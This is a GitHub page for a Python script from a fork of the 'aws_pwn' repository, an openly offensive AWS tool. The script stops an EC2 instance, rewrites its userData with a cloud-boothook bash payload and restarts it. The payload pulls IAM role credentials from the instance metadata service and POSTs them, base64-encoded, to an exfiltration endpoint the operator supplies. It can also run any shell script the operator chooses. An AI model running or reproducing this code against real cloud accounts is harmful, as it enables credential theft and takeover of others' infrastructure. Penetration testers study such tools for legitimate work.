forked from dagrz/aws_pwn
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbouncy_bouncy_cloudy_cloud.py
executable file
·101 lines (83 loc) · 2.81 KB
/
bouncy_bouncy_cloudy_cloud.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
#!/usr/bin/env python
from __future__ import print_function
import boto3
from botocore.exceptions import ClientError
import json
import argparse
import time
def main(args):
result = stop_instance(args.instance_id)
if result:
update_userdata(args.instance_id, prepare_user_data())
start_instance(args.instance_id)
else:
print('Failed to stop instance, quitting.')
def stop_instance(instance_id):
print('Stopping instance.')
client = boto3.client('ec2')
result = False
try:
response = client.stop_instances(
InstanceIds=[instance_id]
)
result = True
except ClientError as e:
print(e.response['Error']['Message'])
return result
def start_instance(instance_id):
print('Starting instance.')
client = boto3.client('ec2')
result = False
try:
response = client.start_instances(
InstanceIds=[instance_id]
)
result = True
except ClientError as e:
print(e.response['Error']['Message'])
return result
def prepare_user_data():
userData = "#cloud-boothook\n"
if args.exfiltration_endpoint:
userData += '''#!/bin/bash
profile=`curl http://169.254.169.254/latest/meta-data/iam/security-credentials/`
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/${profile} > /tmp/garbage
garbage=`base64 -w 0 /tmp/garbage`
curl -X POST -d "garbage=${garbage}" ''' + args.exfiltration_endpoint
elif args.code_file:
userData += args.code_file.read()
return userData
def update_userdata(instance_id, user_data):
print('Setting userData.')
client = boto3.client('ec2')
result = False
code = 'IncorrectInstanceState'
while(code == 'IncorrectInstanceState' and not result):
try:
response = client.modify_instance_attribute(
InstanceId=instance_id,
UserData={
'Value': user_data
}
)
result = True
except ClientError as e:
code = e.response['Error']['Code']
if code != 'IncorrectInstanceState':
print(e.response['Error']['Message'])
time.sleep(20)
return result
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Attempts to jack credentials from an ec2 instance or run a shell script of your choice.")
parser.add_argument('-i',
'--instance-id',
required=True)
parser.add_argument('-e',
'--exfiltration-endpoint',
required=False)
parser.add_argument('-c',
'--code-file',
type=argparse.FileType('r'),
required=False)
args = parser.parse_args()
main(args)